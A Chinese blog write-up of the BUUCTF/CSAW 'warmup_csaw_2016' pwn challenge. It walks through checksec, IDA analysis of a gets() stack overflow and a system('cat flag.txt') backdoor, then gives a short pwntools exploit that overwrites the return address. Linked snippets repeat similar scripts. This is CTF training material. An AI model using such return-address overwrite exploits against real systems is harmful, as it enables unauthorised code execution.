[BUUCTF-pwn]——warmup_csaw_2016

最新推荐文章于 2025-10-24 18:30:00 发布
原创 最新推荐文章于 2025-10-24 18:30:00 发布 · 5.9k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何解决一个64位Linux程序的栈溢出问题,通过IDA反汇编分析,发现了gets函数可能导致栈溢出。利用字符串中的线索,找到了执行`system(catflag.txt)`的方法。通过构造payload,成功覆盖返回地址来执行flag文件的读取。此题解法与前一题相似,适合熟悉栈溢出漏洞利用的学习者。

[BUUCTF-pwn]——warmup_csaw_2016

  • 题目地址:https://buuoj.cn/challenges#warmup_csaw_2016
  • 题目:
    在这里插入图片描述
    管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。
    在这里插入图片描述
    赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。
    在这里插入图片描述
    按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.txt。虽然没有 /bin/sh,可以获得权限。但是这个足够我们拿到flag了。
    在这里插入图片描述
    双击,发现在sub_40060D这个函数里面。
    在这里插入图片描述
    进这个函数看看,眼前一亮,就是我们想要的 system(“cat flag.txt”)在这里插入图片描述
    点击查看函数所在位置,发现0x400611是压参数的地方
    。我们可以将其作为返回地址。
    在这里插入图片描述
    在这里插入图片描述

查看v5的位置,发现离返回地址的距离是0x40 + 8。
在这里插入图片描述在这里插入图片描述

所以这道题的exploit为

from pwn import *
p = remote('ip地址',ip端口)
payload='a'*(0x40+8)+p64(0x400611)
p.sendline(payload)
p.interactive()

在这里插入图片描述
其实这道题和上一道题解法基本一样,感兴趣的也可以去看看 😃

buuctf|warmup_csaw_2016 1
m0_64236521的博客
04-15 1849
buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下,是64位文件 拉进ida,发现gets(v5),查看v5,明显的栈溢出 找到system,地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...
BUUCTFwarmup_csaw_2016
2201_75556700的博客
11-29 665
4、这里有两个数组都是64字节,在sprintf这里,将sub_40060D函数的地址存放在s中。题目一:【BUUCTFwarmup_csaw_2016。3、使用ida64分析文件,找到main函数,F5反汇编。2、下载附件,在kali中分析,64位,小端存储。5、查看函数sub_40060D,地址。03、权限不够时,添加权限就可以。04、使用r命令运行程序。05、使用n命令单步调试。01、使用gdb工具。
[BUUCTF-PWN] warmup_csaw_2016
weixin_44570459的博客
10-07 127
3、双击后通过ctrl+x交叉引用,定位这个敏感字符串在sub_40060D这个地址函数中被调用。4、进一步跟踪该地址函数,发现该函数为后门函数,通过系统调用读取flag.txt。1、发现存在gets函数,可导致栈溢出漏洞,其中v5长度为0x40。2、通过shitf+F12发现敏感字符串:cat flag.txt。
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 491
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
2025 版最新 CTF 学习资源整理:含 BurpSuite/IDA 工具包、picoCTF 比赛时间,附解题思路 + BUUCTF 靶场,推荐收藏!
最新发布
shandongjiushen的博客
10-24 1422
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 704
buuctf pwn
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 562
64位的linux文件。
buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 644
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
BUUCTF-PWN题详解(warmup_csaw_2016&ciscn_2019_n_1)
2302_80325559的博客
11-26 1266
在文章后面补充了栈的知识点,大佬们可以先看看然后再看题解。
BUUCTF PWN wp--warmup_csaw_2016
2302_81740139的博客
08-19 1349
这个数组在栈帧中的位置相对于基指针ebp是偏移量-40的地方(如果ebp指向栈帧的底部),这通常意味着它是函数中的一个局部变量。PIE(Position-Independent Executable)是一种安全特性,它使得程序的代码可以在内存中的任意位置加载,这样每次程序运行时地址空间布局都是随机的,增加了利用内存损坏漏洞的难度。在函数开始执行时,如果函数要使用某些寄存器,并且这些寄存器在调用者中之后还需要使用,那么这些寄存器的值需要在栈上保存,以便在函数返回前恢复。仅为个人理解,如有错误,请指正。
BUUCTF-PWN】3-warmup_csaw_2016
燕麦葡萄干的博客
07-04 386
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 214
BUUCTF 做题练习
[每日一PWN]BUUCTF warmup_csaw_2016
qq_55233040的博客
11-20 592
和第一题RIP一样,是经典而基础的ret2text。
BUUCTF warmup_csaw_2016
m0_54262894的博客
08-20 431
BUUCTF warmup_csaw_2016 下载文件,把它拖入虚拟机中先checksec一下 这是一个64位的文件,并且没有开启任何的保护 我们先运行一下试试 发现它给出了一个地址,我们先记下,可能会用到 放入64位IDA中查看一下他的代码 伪C代码↓ 汇编代码↓ 发现了一个函数sprintf,并且用%p的方式来输出,也就是输出地址 下面是我搜索到的信息 我们双击40060D看一下 再回过头来看代码 众所周知gets函.
BUUCTF warmup_csaw_2016 1
qq_56313338的博客
09-10 437
简单的栈溢出
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1407
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 625
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
BUUctf warmup_csaw_2016
A_fish_like_sing的博客
03-14 500
buu ctf pwn warmup_csaw_2016
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值